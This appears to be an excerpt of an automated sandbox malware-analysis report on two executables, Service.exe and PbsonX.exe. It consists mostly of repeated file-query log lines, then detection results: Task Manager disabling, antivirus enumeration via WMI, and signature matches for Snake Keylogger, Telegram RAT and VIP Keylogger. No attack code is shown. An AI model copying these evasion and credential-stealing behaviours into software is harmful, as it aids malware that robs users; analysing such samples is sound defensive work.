Source: C:\Users\user\AppData\Roaming\Service.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe Queries volume information: C:\Users\user\AppData\Roaming\Service.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe Queries volume information: C:\Users\user\AppData\Roaming\Service.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Queries volume information: C:\Users\user\AppData\Local\Temp\PbsonX.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Queries volume information: C:\Users\user\AppData\Local\Temp\PbsonX.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Queries volume information: C:\Users\user\AppData\Local\Temp\PbsonX.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Queries volume information: C:\Users\user\AppData\Local\Temp\PbsonX.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Queries volume information: C:\Users\user\AppData\Local\Temp\PbsonX.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Queries volume information: C:\Users\user\AppData\Local\Temp\PbsonX.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe Queries volume information: C:\Users\user\AppData\Roaming\Service.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe Queries volume information: C:\Users\user\AppData\Roaming\Service.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe Queries volume information: C:\Users\user\AppData\Roaming\Service.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe Queries volume information: C:\Users\user\AppData\Roaming\Service.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe Queries volume information: C:\Users\user\AppData\Roaming\Service.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe Queries volume information: C:\Users\user\AppData\Roaming\Service.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings
barindex
Contains functionality to disable the Task Manager (.Net Source)
Source: PbsonX.exe.1.dr, Program.cs .Net Code: TaskMan
Source: Service.exe.2.dr, Program.cs .Net Code: TaskMan
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Users\user\AppData\Roaming\Service.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
Source: C:\Users\user\AppData\Roaming\Service.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

Stealing of Sensitive Information
barindex
Yara detected Snake Keylogger
Source: Yara match File source: 00000007.00000002.2990666211.0000000003311000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2984356674.0000000003121000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.2982055964.00000000032D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.2980427569.0000000003231000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2989084490.00000000033C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2977007096.0000000002AF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.2980958448.00000000029C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2979628211.00000000024B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2977673273.0000000002A31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2978687690.0000000002A41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.2989517140.00000000030E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.2982352681.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2973181708.00000000023F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.2989673597.0000000002491000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.2988389961.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2979365430.0000000002451000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.2989928509.0000000002B51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2976208551.0000000003041000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.2980425692.00000000023B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.2983393023.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2977671977.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Yara detected Telegram RAT
Source: Yara match File source: 2.2.PbsonX.exe.376d980.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.PbsonX.exe.382d410.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.PbsonX.exe.371d970.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.PbsonX.exe.37e8fe0.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.PbsonX.exe.37f61d0.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.PbsonX.exe.37f61d0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.PbsonX.exe.37b1db0.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.PbsonX.exe.37b1db0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.PbsonX.exe.376d980.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.PbsonX.exe.382d410.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.PbsonX.exe.37e8fe0.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.PbsonX.exe.371d970.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.1800079314.0000000003729000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.1900190311.00000000036D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Yara detected VIP Keylogger
Source: Yara match File source: 2.2.PbsonX.exe.376d980.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.PbsonX.exe.382d410.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.PbsonX.exe.371d970.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.PbsonX.exe.37e8fe0.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.PbsonX.exe.37f61d0.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.PbsonX.exe.37f61d0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.PbsonX.exe.37b1db0.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.PbsonX.exe.37b1db0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.PbsonX.exe.376d980.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.PbsonX.exe.382d410.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.PbsonX.exe.37e8fe0.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.PbsonX.exe.371d970.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000F.00000002.2979365430.00000000025F4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2977007096.0000000002C94000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.2983393023.0000000002CC7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2978687690.0000000002BE6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.2980425692.0000000002557000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2984356674.00000000032C4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.2980427569.00000000033D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2989084490.0000000003566000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.2988389961.0000000002E88000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.2989517140.0000000003288000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
